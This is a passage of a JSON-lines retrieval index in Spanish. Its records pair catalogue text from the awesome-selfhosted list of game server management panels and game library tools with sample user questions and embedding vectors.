0.04715, -0.07994, 0.00273, -0.02153, 0.0311, -0.02281, -0.03751, -0.09828, -0.08271, 0.02177, 0.02443, -0.07428, 0.00378, 0.03881, 0.05449, -0.02888, -0.02468, 0.02248, 0.01312, 0.04177, -0.11634, -0.06292, 0.00247, 0.09149, 0.00573, 0.01678, 0.0354, -0.01887, -0.02449, 0.06014, 0.00587, -0.11153, 0.03767, -0.01626, 0.02916, -0.03196, -0.03837, 0.09579, -0.10411, 0.01825, 0.0493, 0.01801, 0.03977, 0.01839, 0.05789, 0.0859, -0.05004, -0.00455, 0.00343, -0.03512, -0.04735, -0.02747, -0.06359, 0.01772, 0.01342, 0.04505, 0.02496, -0.01396, -0.06712, 0.01807, 0.03425, 0.0257, 0.01026, -0.05069, -0.01016, 0.01381, 0.09868, -0.01507, -0.05359, 0.06359, -0.00538, 0.01569, -0.04741, -0.02912, 0.00046, 0.02993, -0.03111, 0.00035, 0.06576, -0.00246, 0.00494, 0.00484, 0.08102, 0.03002, -0.04243, 0.04135, 0.004, -0.01411, -0.0255, -0.01321, -0.02837, 0.02214, 0.03731, -0.0095, 0.01386, -0.00861, 0.00906, -0.05467, -0.01933, 0.03041, 0.06175, -0.05744, -0.03232, -0.06422, 0.01999, -0.00936, 0.01534, 0.01724, -0.02015, 0.06047, -0.03882, -0.0549, -0.05968, 0.01632, 0.01631, 0.01393, -0.0002, -0.03266, -0.04089, -0.06694, -0.06746, -0.05019, -0.0409, -0.02931, 0.01151, 0.01929, -0.01335, 0.05, 0.05414]} -{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: auto-mcs β€” Cross-platform Minecraft server manager [AGPL-3.0, Python]. Calagopus β€” Modern game server management panel. Deploy, monitor, and manage Minecraft, Hytale, and other game servers with industry-leading performance [MIT, Rust/Docker/deb]. Crafty Controller β€” Minecraft launcher and manager that allows users to start and administer Minecraft servers from a user-friendly interface [GPL-3.0, Docker/Python]. Drop β€” Game distribution platform, designed for distributing and sharing DRM-free games efficiently (alternative to Steam, GameVault) [AGPL-3.0, Docker]. EasyWI β€” Easy-Wi is a Web-interface that allows you to manage server daemons like gameservers. In addition it provides you with a CMS which includes a fully automated game- and voiceserver lending service [GPL-3.0, PHP/Shell]. GameAP β€” Game Administration Panel for managing game servers on Linux and Windows [MIT, Go/Docker].", "indexar": "que programa sirve para gestionar un servidor de Minecraft en una plataforma web?", "v": [-0.03079, 0.0297, -0.14416, -0.24988, -0.03142, -0.09009, -0.13534, -0.01303, -0.04081, -0.15016, 0.02886, -0.02787, 0.16186, -0.08619, 0.0038, 0.05419, 0.14521, -0.18085, 0.06481, 0.07177, -0.00405, 0.053, 0.07438, -0.07296, -0.04806, 0.00377, 0.07873, -0.05181, -0.10123, -0.03069, -0.00052, -0.02042, 0.00278, -0.04038, 0.05468, -0.11484, 0.041, 0.04875, -0.03927, -0.00959, -0.03102, 0.03359, -0.03715, -0.02079, 0.06218, -0.03541, 0.12828, -0.12268, 0.05704, 0.03435, -0.05158, -0.07273, -0.18038, 0.08522, -0.00266, 0.04058, 0.04685, -0.19469, 0.0622, -0.01128, -0.18852, 0.0045, -0.0455, -0.07014, 0.03187, -0.00286, 0.00563, 0.0843, -0.09721, 0.07246, 0.00569, 0.0778, 0.048, -0.08291, 0.0191, 0.03756, 0.00619, -0.00818, 0.00868, -0.00197, 0.05219, 0.05942, -0.08285, 0.10936, -0.10272, -0.03299, 0.01959, -0.05225, 0.04075, -0.03674, 0.02461, 0.05464, -0.09038, 0.03897, 0.02852, -0.08198, 0.15156, -0.03641, 0.02441, -0.00267, -0.00321, 0.02109, -0.05261, 0.05077, -0.0802, 0.16659, 0.07983, -0.12984, -0.07126, -0.02166, 0.06016, 0.00144, -0.03173, 0.01458, -0.05595, 0.04277, -0.02893, 0.04245, 0.07581, 0.05216, -0.05924, -0.02532, 0.06183, 0.0236, 0.08685, 0.048, -0.04353, 0.05115, -0.00589, 0.0088, -0.03153, -0.0823, -0.05104, 0.02964, -0.04727, -0.01946, 0.08113, -0.00724, -0.01704, -0.06166, -0.00022, 0.07506, -0.00995, -0.00488, 0.1329, -0.05895, 0.06822, -0.08955, 0.03572, 0.0564, -0.01762, -0.01032, -0.04601, 0.0107, -0.11322, -0.03189, -0.0025, -0.01411, -0.1568, 0.07767, -0.00836, -0.01093, 0.00711, 0.08006, 0.02848, 0.01619, -0.01446, 0.10753, 0.03954, 0.03745, -0.01079, 0.0791, 0.0644, -0.08087, 0.0212, -0.0029, -0.05996, -0.08837, 0.01677, 0.0108, -0.06837, -0.02689, 0.00318, 0.05167, -0.0872, -0.03346, -0.02244, 0.01825, -0.05276, 0.04121, 0.00588, 0.02314, -0.0626, 0.05965, 0.02535, -0.03608, -0.04827, -0.00961, 0.00482, -0.06511, -0.02403, -0.03747, -0.00882, -0.01487, 0.00359, 0.05888, -0.0179, -0.0043, 0.05772, 0.02636, -0.0359, -0.00906, 0.07627, -0.02041, 0.01999, -0.04246, 0.09973, -0.04453, 0.03869, -0.03209, -0.02458, 0.00549, 0.01148, 0.0386, 0.01829, 0.00724, 0.0343, -0.00173, 0.02086, -0.0114, -0.0088, -0.04797, -0.01234, 0.01296, 0.01816, -0.05974, 0.05334, 0.00239, -0.06234, -0.04815, -0.03258, 0.06388, 0.01858, -0.04746, 0.0087, -0.05147, -0.02598, 0.00336, -0.03868, -0.02002, -0.04315, -0.02742, 0.03479, -0.01487, -0.00738, 0.03761]} -{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: auto-mcs β€” Cross-platform Minecraft server manager [AGPL-3.0, Python]. Calagopus β€” Modern game server management panel. Deploy, monitor, and manage Minecraft, Hytale, and other game servers with industry-leading performance [MIT, Rust/Docker/deb]. Crafty Controller β€” Minecraft launcher and manager that allows users to start and administer Minecraft servers from a user-friendly interface [GPL-3.0, Docker/Python]. Drop β€” Game distribution platform, designed for distributing and sharing DRM-free games efficiently (alternative to Steam, GameVault) [AGPL-3.0, Docker]. EasyWI β€” Easy-Wi is a Web-interface that allows you to manage server daemons like gameservers. In addition it provides you with a CMS which includes a fully automated game- and voiceserver lending service [GPL-3.0, PHP/Shell]. GameAP β€” Game Administration Panel for managing game servers on Linux and Windows [MIT, Go/Docker].", "indexar": "cual es la mejor alternativa libre a Steam o GameVault para distribuir juegos?", "v": [-0.1891, 0.00556, -0.06682, -0.09578, -0.08512, -0.01202, -0.12581, -0.07118, 0.03416, -0.08329, -0.06732, -0.12429, -0.11143, 0.00381, 0.06604, -0.02559, 0.05333, -0.02218, 0.11374, -0.0117, -0.00955, -0.01688, -0.08829, -0.21941, -0.05271, 0.04077, 0.04131, 0.03706, -0.07236, 0.0441, 0.00702, -0.12003, 0.13383, -0.21144, 0.01116, -0.15593, 0.12086, -0.00828, 0.15974, 0.06187, 0.03857, 0.00558, 0.01278, -0.03874, 0.02588, -0.0122, -0.0416, 0.0337, 0.03075, -0.09192, -0.03861, 0.05496, -0.02134, -0.14156, 0.1085, -0.01582, 0.05169, -0.12914, -0.03188, -0.06144, -0.09286, -0.05149, 0.06188, -0.08903, -0.00414, 0.08581, -0.15128, -0.01853, -0.03724, 0.16816, -0.02029, 0.03779, 0.02174, 0.06362, -0.068, 0.05885, -0.06507, -0.0466, 0.03793, 0.04456, 0.07997, -0.13313, 0.01881, 0.04294, 0.02632, -0.05632, 0.05955, -0.12083, 0.011, 0.02305, 0.03186, -0.08861, -0.08542, 0.12554, 0.01066, -0.20021, 0.09263, 0.00581, 0.05299, 0.06617, -0.03682, -0.01587, -0.09776, 0.03569, -0.07111, -0.06088, 0.03558, -0.02381, -0.03352, -0.01248, 0.00654, 0.03966, -0.03022, 0.10834, 0.04038, -0.01921, -0.03751, -0.03963, 0.13381, 0.05641, -0.05489, -0.00062, 0.03237, 0.00252, 0.03139, -0.03435, -0.0061, 0.02857, -0.08967, -0.00668, 0.01972, -0.07471, -0.04525, 0.04382, -0.16709, -0.06826, 0.09075, 0.03466, -0.03066, 0.02458, 0.04256, 0.04118, 0.05289, 0.00968, 0.03583, 0.03885, 0.0702, -0.02254, 0.0131, -0.08172, 0.02503, 0.04295, 0.00935, 0.0114, 0.02303, 0.08347, -0.00502, 0.03064, -0.11052, 0.07335, 0.04612, 0.00128, -0.0257, 0.00429, 0.00498, 0.01234, 0.06532, 0.01487, -0.04182, -0.01878, -0.01966, 0.04421, -0.00748, -0.03961, 0.0098, -0.00461, -0.01488, 0.00806, -0.01403, -0.01858, 0.02632, -0.0117, -0.04678, -0.00571, -0.07536, -0.07288, 0.01019, -0.05271, 0.03663, 0.02701, -0.0293, -0.00072, -0.06349, -0.02401, 0.02609, -0.00804, 0.06942, -0.07966, -0.01487, 0.02951, -0.01502, 0.00299, -0.07241, -0.03847, -0.04451, 0.01171, 0.0133, -0.01735, -0.03728, 0.03202, 0.05378, 0.01573, 0.06768, 0.03853, 0.01337, -0.01199, 0.05829, -0.04166, 0.01913, -0.04301, -0.00661, -0.01466, 0.06081, -0.07809, -0.01092, 0.00145, 0.03819, 0.03043, -0.0206, -0.00922, 0.02806, 0.03035, 0.03958, 0.0323, -0.0024, 0.04777, 0.02035, 0.02517, -0.01103, -0.01188, 0.03046, -0.01833, -0.01632, -0.05086, -0.05488, -0.06608, -0.05654, -0.04636, -0.06378, -0.05895, -0.06415, -0.0821, 0.01433, -0.01138, -0.01817, 0.02586]} -{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: auto-mcs β€” Cross-platform Minecraft server manager [AGPL-3.0, Python]. Calagopus β€” Modern game server management panel. Deploy, monitor, and manage Minecraft, Hytale, and other game servers with industry-leading performance [MIT, Rust/Docker/deb]. Crafty Controller β€” Minecraft launcher and manager that allows users to start and administer Minecraft servers from a user-friendly interface [GPL-3.0, Docker/Python]. Drop β€” Game distribution platform, designed for distributing and sharing DRM-free games efficiently (alternative to Steam, GameVault) [AGPL-3.0, Docker]. EasyWI β€” Easy-Wi is a Web-interface that allows you to manage server daemons like gameservers. In addition it provides you with a CMS which includes a fully automated game- and voiceserver lending service [GPL-3.0, PHP/Shell]. GameAP β€” Game Administration Panel for managing game servers on Linux and Windows [MIT, Go/Docker].", "indexar": "con que puedo montar y administrar servidores de juegos como Hytale desde un panel sencillo?", "v": [-0.07115, 0.07329, -0.11914, -0.15667, -0.14326, -0.06091, -0.02988, -0.0555, -0.09597, -0.07212, -0.09927, 0.01325, 0.1339, -0.01709, 0.09943, 0.10522, 0.12466, -0.08822, 0.02817, 0.08299, -0.02257, 0.06687, -0.08908, -0.0557, -0.11001, 0.05317, 0.12762, -0.06302, -0.15355, -0.01959, 0.04022, -0.02994, 0.03335, -0.01897, -0.04471, -0.10868, -0.03877, 0.18219, -0.03243, 0.03508, -0.0834, -0.05653, 0.00276, 0.00056, -0.01727, 0.05741, 0.10577, -0.0926, 0.06909, -0.04247, -0.00199, -0.07546, -0.09731, -0.05621, -0.02281, -0.0806, 0.01424, -0.06841, 0.03639, -0.06738, -0.09176, 0.0982, 0.00243, 0.05287, -0.01811, 0.01342, -0.00171, -0.04095, -0.11422, 0.06232, -0.07795, 0.00654, -0.00477, -0.03681, -0.03337, 0.08942, -0.12091, -0.07461, 0.03919, 0.04073, -0.01212, -0.07964, -0.06665, 0.12106, -0.15024, -0.07727, -0.04495, -0.13478, -0.01727, 0.00767, 0.08584, -0.06086, -0.03418, -0.0008, -0.1056, -0.07644, 0.11008, 0.0484, 0.02511, 0.03007, -0.01666, 0.02961, 0.00796, 0.1083, -0.08115, 0.07132, 0.10948, -0.06863, 0.04484, -0.12381, 0.03285, -0.00717, -0.06549, 0.07534, -0.01894, -0.11592, -0.06551, 0.05849, -0.02845, 0.03001, -0.0629, 0.01503, 0.10109, 0.04843, 0.0888, -0.09491, 0.13445, 0.0425, -0.02265, -0.01942, 0.03021, -0.01989, -0.03948, 0.03357, -0.04458, 0.04509, -0.01358, 0.03309, -0.05008, 0.02336, 0.05308, 0.10676, -0.00335, -0.06105, 0.11445, 0.02999, 0.10262, -0.06004, 0.05008, 0.01089, 0.03369, 0.06212, -0.03013, 0.02321, -0.0779, 0.02835, 0.09033, -0.02299, -0.06741, 0.0198, -0.02957, 0.06249, -0.02339, 0.03974, 0.02666, -0.01534, -0.06715, 0.05701, 0.05836, 0.03446, -0.04349, 0.07174, 0.02065, -0.06273, 0.03979, 0.02808, -0.04306, -0.00045, 0.06547, 0.00031, -0.02703, 0.02374, -0.04616, 0.07669, -0.0764, -0.06992, 0.0003, -0.00069, 0.00975, 0.06595, 0.02605, 0.04815, -0.06902, 0.04864, 0.04347, -0.04477, 0.01984, 0.00374, -0.04036, -0.00954, 0.02897, -0.02205, -0.01139, -0.05984, -0.01512, 0.02733, -0.05596, 0.10879, 0.02824, 0.06056, 0.04922, 0.04244, 0.06434, -0.04943, 0.01598, -0.02173, 0.04633, -0.01757, -0.01366, 0.00332, 0.01724, 0.0242, 0.04714, -0.02038, -0.00994, 0.06429, -0.00287, 0.06448, 0.01601, 0.01367, -0.04809, 0.04288, 0.00364, -0.00288, -0.03018, -0.02202, 0.061, -0.05148, -0.0553, -0.01243, 0.03036, 0.00268, -0.006, -0.0774, -0.02451, -0.12069, -0.05195, 0.01881, -0.06262, -0.03488, -0.04443, -0.04272, 0.00159, -0.01033, -0.06099, -0.0283]} -{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Gameyfin β€” Video game library manager with automatic scanning, web access, downloads, and plugin support [AGPL-3.0, Docker]. Gaseous Server β€” Game ROM manager with a built-in web-based emulator using multiple sources to identify and provide metadata [⚠, AGPL-3.0, Docker/.NET]. Lancache β€” LAN Party game caching made easy [⚠, MIT, Docker/Shell]. LinuxGSM β€” CLI tool for deployment and management of dedicated game servers on Linux: more than 120 games are supported [MIT, Shell]. Minus Games β€” Sync games and save files across multiple devices [MIT, Rust]. Ownfoil β€” Nintendo Switch library manager, with automated management tasks (file identification and organization, missing updates/DLC), serving your library to multiple supported clients on your Switch, with shop customization and multi user authentication [AGPL-3.0, Docker/Python].", "indexar": "que programa sirve para gestionar una biblioteca de videojuegos en casa", "v": [0.09479, -0.02545, -0.01022, -0.18659, -0.02973, -0.09673, -0.05796, -0.09241, 0.07515, -0.23832, 0.01215, -0.18045, -0.03265, 0.02559, -0.02918, 0.02382, 0.14203, -0.07979, 0.07808, 0.00411, 0.06858, 0.10368, -0.01258, 0.01958, -0.00415, 0.02719, 0.12918, -0.02111, -0.06542, 0.12002, -0.03433, -0.03929, 0.071, -0.15952, 0.02541, -0.03124, 0.04871, -0.01079, 0.02434, 0.03902, 0.04544, 0.07819, 0.02479, -0.00837, 0.03101, -0.08683, 0.19811, -0.05085, -0.00056, 0.00741, -0.05909, -0.05666, 0.01111, 0.01142, 0.07799, -0.07784, -0.04016, -0.15284, 0.02177, -0.05965, -0.13446, -0.00052, 0.07392, -0.03724, 0.06768, 0.03521, 0.01316, 0.07382, -0.05127, 0.09491, -0.10538, 0.05706, 0.03561, 0.03631, -0.11076, 0.02134, -0.01322, -0.04523, 0.02249, -0.06954, 0.0197, -0.08719, -0.05315, -0.01491, -0.03284, 0.00898, -0.00987, -0.05302, 0.07666, -0.10991, -0.06891, 0.02095, -0.07014, -0.024, 0.12747, -0.10882, 0.15362, 0.00243, 0.05621, 0.03887, 0.01413, -0.01881, -0.07702, 0.13445, -0.08948, 0.01833, 0.02646, -0.0346, -0.05871, -0.10289, 0.02745, 0.07328, -0.01137, 0.03987, -0.02553, 0.06996, -0.00479, -0.00856, 0.15039, 0.09799, -0.18296, -0.00685, 0.04213, -0.04609, 0.03372, -0.02692, 0.06697, -0.02335, -0.01637, 0.02272, -0.01386, -0.03721, -0.05331, 0.04626, -0.05994, 0.01068, -0.06035, -0.06327, -0.06193, -0.05331, 0.08164, 0.1077, 0.03169, 0.02241, 0.00568, -0.03946, 0.08643, 0.02107, 0.00179, -0.00273, 0.04151, -0.00273, 0.03953, 0.00601, 0.00261, 0.10241, 0.04068, -0.0026, -0.13273, -0.00694, -0.03075, 0.04664, -0.00362, -0.079, -0.06958, 0.01811, 0.07827, 0.07967, 0.03903, 0.02891, -0.1008, 0.01371, -0.00141, -0.04368, -0.03769, -0.02171, -0.0048, 0.00021, -0.02003, 0.03381, -0.07119, 0.00492, 0.0244, 0.01688, -0.11991, -0.05282, -0.03595, -0.00716, -0.05262, -0.08344, -0.07751, -0.005, -0.0378, 0.02559, 0.03653, -0.01323, -0.02118, 0.02626, 0.0404, -0.03253, 0.04764, 0.03895, 0.04759, 0.08523, 0.01066, 0.0449, 0.00972, 0.01004, 0.03509, 0.01559, -0.0227, 0.04725, 0.03751, 0.10145, 0.00567, -0.07905, -0.03538, 0.0656, 0.06231, -0.02908, 0.01754, -0.0111, 0.02324, -0.02829, 0.02267, -0.01439, 0.02357, -0.01412, 0.00358, -0.0106, -0.00707, -0.08814, 0.06982, 0.08364, -0.00787, -0.012, 0.03774, 0.02654, -0.03009, -0.01644, -0.06401, 0.01022, -0.02548, -0.02958, -0.018, -0.05075, -0.05, -0.02667, -0.00462, -0.01866, -0.05473, -0.05016, -0.0072, 0.03978, -0.00836, 0.06412]} -{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Gameyfin β€” Video game library manager with automatic scanning, web access, downloads, and plugin support [AGPL-3.0, Docker]. Gaseous Server β€” Game ROM manager with a built-in web-based emulator using multiple sources to identify and provide metadata [⚠, AGPL-3.0, Docker/.NET]. Lancache β€” LAN Party game caching made easy [⚠, MIT, Docker/Shell]. LinuxGSM β€” CLI tool for deployment and management of dedicated game servers on Linux: more than 120 games are supported [MIT, Shell]. Minus Games β€” Sync games and save files across multiple devices [MIT, Rust]. Ownfoil β€” Nintendo Switch library manager, with automated management tasks (file identification and organization, missing updates/DLC), serving your library to multiple supported clients on your Switch, with shop customization and multi user authentication [AGPL-3.0, Docker/Python].", "indexar": "cual herramienta me ayuda a organizar y descargar juegos desde mi red local", "v": [-0.07426, 0.18636, -0.09783, -0.19289, 0.01889, -0.03051, -0.12254, 0.07262, -0.08116, -0.12541, -0.19276, -0.14786, 0.0039, -0.10183, 0.12453, -0.04362, 0.10674, -0.00153, 0.0443, 0.01661, -0.03118, 0.02678, -0.1015, -0.00571, -0.03209, 0.01465, 0.17245, -0.04298, -0.15498, -0.00125, -0.00751, -0.04475, 0.01705, -0.06538, -0.10804, -0.03003, 0.08853, 0.02112, -0.05191, -0.03931, -0.12413, 0.02923, -0.06871, 0.02334, 0.08396, 0.0103, 0.03617, 0.01308, -0.04569, 0.01122, -0.04226, -0.12509, -0.06579, -0.15486, -0.03618, -0.20256, 0.10217, -0.189, -0.04388, -0.07229, -0.11548, -0.03062, -0.04455, 0.02359, 0.10082, 0.0501, -0.00258, -0.01451, -0.09796, 0.08264, -0.05567, 0.06388, 0.00159, -0.00305, -0.04458, 0.03682, 0.00718, -0.01455, 0.07962, -0.0398, 0.10347, -0.00516, -0.04895, 0.11366, -0.00232, -0.11861, 0.03535, -0.04979, 0.0468, -0.0633, 0.01353, -0.10007, -0.0032, 0.00998, -0.03838, -0.10143, 0.10036, 0.02651, 0.06803, 0.0631, -0.00022, -0.11952, -0.04714, 0.0044, -0.01547, -0.03844, 0.00486, 0.04348, -0.02712, 0.00966, 0.03504, 0.02758, 0.06515, 0.07844, 0.01627, -0.03664, 0.0578, -0.01008, 0.02613, -0.04421, -0.01845, 0.06067, -0.0462, -0.02194, -0.02239, -0.06151, 0.00538, 0.0842, -0.01399, -0.04291, 0.01997, -0.06929, -0.04759, -0.02242, -0.05108, -0.05157, -0.00701, -0.10353, -0.02853, -0.01387, -0.02198, 0.0055, -0.05667, -0.11118, 0.046, 0.08064, 0.06496, -0.03354, 0.00344, 0.01747, 0.06465, -0.02303, 0.01221, -0.01919, -0.02583, 0.08962, 0.03947, 0.00937, -0.06895, -0.02088, -0.05944, -0.02116, 0.07709, -0.06709, -0.04363, -0.0669, 0.06356, 0.0801, 0.04083, 0.01753, -0.05101, 0.01698, -0.02826, -0.05801, -0.04014, -0.11565, -0.01095, -0.06414, -0.00425, -0.08029, 0.03851, 0.04429, 0.00625, 0.0321, -0.0358, -0.09028, 0.03688, -0.05035, 0.00795, -0.02039, -0.02298, 0.01124, -0.03689, -0.04676, 0.03863, 0.01693, -0.02616, -0.08457, 0.03689, -0.02049, -0.0736, -0.05983, -0.05544, -0.02459, 0.02149, 0.07853, -0.0244, -0.00222, -0.04432, 0.04351, 0.0283, 0.04362, 0.04274, 0.02364, -0.02329, -0.04528, 0.03415, -0.00942, -0.00491, -0.0455, 0.00187, -0.02364, 0.07936, -0.0353, -0.05279, -0.00832, 0.07108, 0.03561, 0.00882, 0.04333, 0.03372, -0.00757, 0.01755, -0.01404, -0.0004, -0.03426, 0.08083, 0.0006, -0.03429, -0.02487, 0.04456, 0.04036, 0.00083, -0.06915, -0.06246, -0.07218, -0.01462, -0.03603, -0.02838, -0.05191, -0.02021, 0.03125, 0.08968, -0.05205, -0.01202, 0.02693]} -{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Gameyfin β€” Video game library manager with automatic scanning, web access, downloads, and plugin support [AGPL-3.0, Docker]. Gaseous Server β€” Game ROM manager with a built-in web-based emulator using multiple sources to identify and provide metadata [⚠, AGPL-3.0, Docker/.NET]. Lancache β€” LAN Party game caching made easy [⚠, MIT, Docker/Shell]. LinuxGSM β€” CLI tool for deployment and management of dedicated game servers on Linux: more than 120 games are supported [MIT, Shell]. Minus Games β€” Sync games and save files across multiple devices [MIT, Rust]. Ownfoil β€” Nintendo Switch library manager, with automated management tasks (file identification and organization, missing updates/DLC), serving your library to multiple supported clients on your Switch, with shop customization and multi user authentication [AGPL-3.0, Docker/Python].", "indexar": "existe alguna alternativa libre que permita sincronizar mis guardados entre dispositivos", "v": [-0.04906, 0.08787, -0.24306, 0.04245, -0.02974, -0.01522, -0.01758, -0.02007, -0.23291, -0.14671, 0.06751, -0.12255, -0.02518, 0.07013, 0.19605, -0.05001, 0.01323, -0.01087, 0.05646, 0.01793, -0.04332, 0.01596, 0.0445, -0.12679, -0.09368, -0.05904, -0.0529, -0.07343, -0.21793, -0.00984, -0.01057, 0.01237, 0.09041, 0.02151, -0.1222, -0.06374, 0.0914, 0.08152, 0.02332, -0.02025, 0.017, -0.0162, 0.0159, 0.07539, -0.00304, -0.08153, -0.11181, 0.06506, -0.00184, 0.18779, -0.05608, 0.03777, -0.09627, 0.05052, 0.04064, -0.09734, 0.20565, -0.04062, 0.01565, -0.00914, -0.07391, 0.00926, 0.10306, -0.01945, 0.02597, 0.08554, -0.03745, 0.06084, -0.06443, 0.09352, 0.07424, -0.00683, 0.03195, 0.03645, -0.08517, 0.10436, -0.1163, 0.01801, 0.01672, 0.11313, 0.0221, -0.02152, 0.01341, -0.03644, -0.09818, -0.09227, 0.08285, 0.04457, 0.00037, 0.02816, 0.06735, 0.0961, -0.03658, 0.10384, -0.0166, -0.07506, -0.07475, 0.11323, 0.02471, 0.0594, 0.13182, 0.09935, -0.10608, -0.0693, -0.02739, 0.03216, 0.03184, -0.0155, 0.07226, 0.01773, 0.01547, 0.05213, -0.02868, -0.03983, -0.07679, 0.02323, -0.02525, -0.05366, 0.04728, -0.0251, -0.03116, -0.04681, 0.01206, -0.05046, 0.08543, 0.03957, 0.02672, 0.03844, -0.01873, 0.05414, 0.08108, -0.03296, 0.00013, -0.11449, -0.06367, -0.04022, -0.0445, -0.01798, 0.02151, -0.00195, 0.067, 0.04248, -0.04832, -0.00831, 0.01097, -0.00418, -0.01253, 0.03247, -0.02796, -0.03607, -0.04444, -0.03974, -0.05901, 0.08314, -0.05586, 0.12853, -0.03763, -0.05848, -0.06881, 0.10596, -0.00727, -0.03792, -0.03188, 0.01229, -0.0937, -0.02139, 0.01248, -0.01044, -0.01337, -1e-05, -0.04073, 0.08986, 0.06517, -0.07958, 0.04769, -0.0363, 0.01018, -0.01626, 0.05584, -0.07042, 0.00656, 0.0441, -0.07321, -0.02597, 0.02707, -0.0726, -0.00421, 0.04232, -0.03867, 0.01125, 0.01032, -0.01647, 0.02056, -0.02781, 0.00063, -0.00455, 0.01568, -0.06155, 0.02655, 0.0363, -0.08797, -0.02307, 0.03872, -0.01064, -0.02953, 0.02128, -0.0327, 0.03844, 0.01921, 0.03532, 0.03151, 0.00307, 0.03181, -0.00283, -0.05142, -0.00612, -0.00295, 0.00902, -0.0469, -0.05915, 0.06835, 0.02915, 0.03422, 0.03055, -0.00106, 0.05867, -0.03149, 0.07889, -0.01656, -0.04661, 0.00802, -0.01346, 0.00617, 0.05996, 0.04236, 0.02802, 0.00994, -0.01152, 0.01579, 0.01991, -0.01153, 0.05404, 0.0056, -0.02298, -0.04836, -0.00618, -0.06842, -0.03386, -0.01765, -0.03065, 0.04082, 0.06617, 0.03394, -0.01462, 0.0289, 0.03694]} -{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Pelican Panel β€” Web application for easy management of game servers, offering a user-friendly interface for deploying, configuring, and managing servers, server monitoring tools, and extensive customization options (fork of Pterodactyl) [AGPL-3.0, PHP/Docker]. Pterodactyl β€” Management panel for game servers, with an intuitive UI for end users [MIT, PHP]. PufferPanel β€” Game server management panel designed for both small networks and game server providers [Apache-2.0, Go]. Retrom β€” Private cloud game library distribution server + frontend/launcher [GPL-3.0, Docker/Rust]. RomM β€” ROM manager for organizing, enriching, and playing retro games, with support for 400+ platforms [⚠, AGPL-3.0, Docker]. SourceBans++ β€” Admin, ban, and communication management system for games running on the Source engine [CC-BY-SA-4.0, PHP]. Sunshine β€” Remote game stream host for Moonlight with support up to 120 frames per second and 4K resolution [GPL-3.0, C++/deb/Docker].", "indexar": "que herramienta sirve para gestionar servidores de videojuegos con una interfaz fΓ‘cil de usar", "v": [0.08558, 0.02411, -0.13458, -0.2292, 0.0478, -0.09144, -0.08168, -0.12754, 0.09217, -0.11538, -0.02868, -0.13069, -0.05133, -0.02417, 0.03406, 0.08796, 0.17043, -0.10496, -0.03843, 0.02899, 0.04196, 0.0629, -0.04792, -0.05522, -0.13072, 0.09525, 0.09229, -0.13361, -0.1635, 0.01381, -0.06994, -0.04612, 0.07682, -0.11017, -0.05824, -0.12431, -0.04845, 0.11892, 0.00285, 0.10569, 0.07549, 0.03956, -0.11241, 0.00505, 0.08495, 0.00216, 0.04608, -0.0596, 0.01888, 0.0777, -0.01785, -0.16382, -0.09166, -0.02116, -0.04024, -0.1078, 0.09848, -0.12741, 0.02555, -0.04439, -0.2078, 0.03756, -0.0226, 0.05266, 0.00278, -0.02402, -0.03989, -0.02415, -0.08142, 0.09817, -0.05147, 0.09527, 0.00834, -0.00631, 0.02914, 0.0547, -0.04057, 0.01605, 0.06579, 0.04153, 0.06897, -0.05136, -0.08844, -0.01628, -0.0864, -0.06456, 0.049, -0.00701, 0.01456, -0.10026, -0.02632, 0.02906, -0.03224, -0.09735, 0.05563, -0.04118, 0.09235, -0.03536, 0.04194, -0.02162, 0.12513, -0.02649, -0.0723, 0.08486, -0.1023, -0.00856, 0.04191, -0.08075, -0.06568, -0.06264, 0.0833, 0.00655, -0.01322, 0.06293, -0.03756, 0.03732, -0.01849, -0.03356, 0.03959, 0.03079, -0.01212, 0.00615, 0.07566, -0.01182, 0.0413, -0.03589, -0.01509, 0.0126, -0.01747, -0.08114, -0.01154, -0.08339, -0.10071, 0.02831, -0.03867, -0.01614, 0.01009, -0.04129, -0.02029, -0.01641, 0.03765, 0.11474, -0.01742, -0.01657, 0.04547, 0.03509, 0.13371, -0.04808, 0.00837, -0.00554, 0.10711, -0.0987, 0.00831, -0.00993, -0.06059, 0.03036, -0.00024, 0.00676, -0.15363, -0.00121, -0.0221, -0.0009, 